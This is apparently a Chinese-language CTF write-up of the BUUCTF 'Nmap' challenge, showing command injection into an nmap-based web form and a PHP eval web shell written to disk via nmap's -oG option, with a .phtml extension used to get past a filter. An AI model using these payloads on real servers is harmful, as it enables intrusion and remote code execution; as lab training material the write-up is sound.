BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
毒果41 分钟前
网络安全全景解析
安全·web安全
云盾安全防护1 小时前
CC攻击与WAF的对抗战
网络·安全·ddos
还是鼠鼠2 小时前
HTTP 请求协议简单介绍
java·开发语言·网络·网络协议·http
网硕互联的小客服3 小时前
如何在服务器上部署 Python Django 应用
linux·运维·服务器·网络·安全
渗透好难3 小时前
CTF show 数学不及格
安全·系统安全·密码学
百度安全4 小时前
BCS 2025|百度副总裁陈洋:智能体在安全领域的应用实践
安全·百度
像素工坊可视化5 小时前
监控升级:可视化如何让每一个细节 “说话”
运维·人工智能·安全
程序员阿超的博客5 小时前
【安全篇】金刚不坏之身:整合 Spring Security + JWT 实现无状态认证与授权
java·spring boot·安全·spring
轨迹H5 小时前
【春秋云镜】CVE-2023-2130漏洞复现exp
网络协议·网络安全·渗透测试·ctf·cve
好想打kuo碎5 小时前
轻量安全的密码管理工具Vaultwarden
linux·安全·ubuntu